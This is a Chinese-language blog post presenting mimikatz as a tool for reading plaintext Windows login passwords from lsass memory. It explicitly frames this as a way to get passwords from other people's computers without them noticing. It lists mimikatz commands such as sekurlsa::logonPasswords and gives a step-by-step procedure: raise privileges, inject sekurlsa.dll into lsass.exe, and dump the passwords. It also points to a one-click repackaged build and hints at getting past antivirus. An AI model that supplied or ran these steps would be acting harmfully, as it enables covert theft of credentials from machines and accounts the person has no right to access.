windows server 2008 密码破解程序

windows登录密码破解也算是老生常谈的问题了，通常情况下都是通过u盘启动器一键清除电脑登录密码，操作方便迅速当然他的弊端也不言而喻，清除密码但无法获知密码，这种情况只能是在自己电脑上密码忘记时采取的最简单最有效的方法，如果在他人电脑上这种方法容易被别人知道，密码你都给人家清除了，还怕人家不发现么！那么有没有一种方法可以不清除密码而是能获得明文密码呢？今天阿刚就给大家介绍一款来自法国黑客的神器，它可以非常迅速显示当前登录系统的明文密码，可谓是相当的强大！（插句话，如果你对国产某卫士对你电脑的精心呵护深信不疑的话，那么下面的内容你可以不用看了，写到这里阿刚突然觉得安全卫士们其实就是安全卫视啊，和那广电总局总以保护青少年身心健康为由封杀露骨影视剧是同样的坑爹做法！貌似扯远了，唉...提起国产电影提起广电总局，我他妈就想........）算了！！！！！

mimikatz是一款功能强大的轻量级调试神器，通过它你可以提升进程权限注入进程读取进程内存，当然他最大的亮点也是让阿刚最感兴趣的就是他可以直接从 lsass中获取当前处于Active系统的登录密码， lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略，通常我们在登陆系统时输入密码之后，密码便会储存在 lsass内存中，经过其 wdigest 和 tspkg 两个模块调用后，对其使用可逆的算法进行加密并存储在内存之中，而mimikatz正是通过

对lsass的逆算获取到明文密码！也就是说只要你不重启电脑，就可以通过他获取到登陆密码，只限当前登陆系统！阿刚把他集成到U盘中想通过PE直接获取登陆密码，但是思败了......！软件有分为32位和64位，大家可以根据系统自行进行测试，另外阿刚这里也收集到了一款国人编译过后版本，无需输入命令双击便可获取密码，不过只限于64位系统！阿刚分别测试过XP windows7 windows8均可获取到密码！下面简单的介绍一下神器的命令：

1 cls 清屏

2.exit 退出

3.version 查看mimikatz的版本

4.system::user 查看当前登录的系统用户

5.system::compute r 查看计算机名称

6..process::list 列出进程

7.process::suspend 进程名称暂停进程

8.process::stop 进程名称结束进程

9.process::modules 列出系统的核心模块及所在位置

10.service::list 列出系统的服务

11.service::remove 移除系统的服务

12.service::start stop 服务名称启动或停止服务

13.privilege::list 列出权限列表

14.privilege::enable 激活一个或多个权限

15.privilege::debug 提升权限

16.nogpo::cmd 打开系统的cmd.exe

17.nogpo::regedit 打开系统的注册表

18.nogpo::taskmgr 打开任务管理器

19.ts::sessions 显示当前的会话

20.ts::processes 显示进程和对应的pid情况等

21.sekurlsa::wdigest 获取本地用户信息及密码

22.sekurlsa::tspkg 获取tspkg用户信息及密码

23.sekurlsa::logonPasswords 获登陆用户信息及密码

指令那是相当的多啊，这里只列举这些，详细大家可以去浏览作者的网站学习，只不过都是法文，估计得请谷歌翻一下！！哦，忘了说了作者是Gentil Kiwi！

获取windows 登陆密码详细教程：

第一步：根据你系统选择对应的版本，双击打开

第二步：输入输入privilege::debug 提升权限

第三步：输入inject::process lsass.exe sekurlsa.dll 将sekurlsa.dll 注入到lsass.exe 中

第四步：输入@getLogonPasswords 即可获取hash和当前用户的明文密码

阿刚在windows7系统下的测试结果：（代码较多图片较长，阿刚将图片中间的代码删除图片剪裁了一下）

当然，如果你觉得输入这些指令实在是有些繁琐，你可以使用国人编译过后的版本，双击之后可以直接获取密码无需输入任何指令，不过只限于64位系统，32位系统的童鞋只能手动输入了！

还是喜欢国人编译后的效果，感觉有点像黑客的样子，哈哈....另外不管你使用哪个版本的，如果你电脑上有安全卫士的话，可能会出现所悟代码，所以......呵呵.......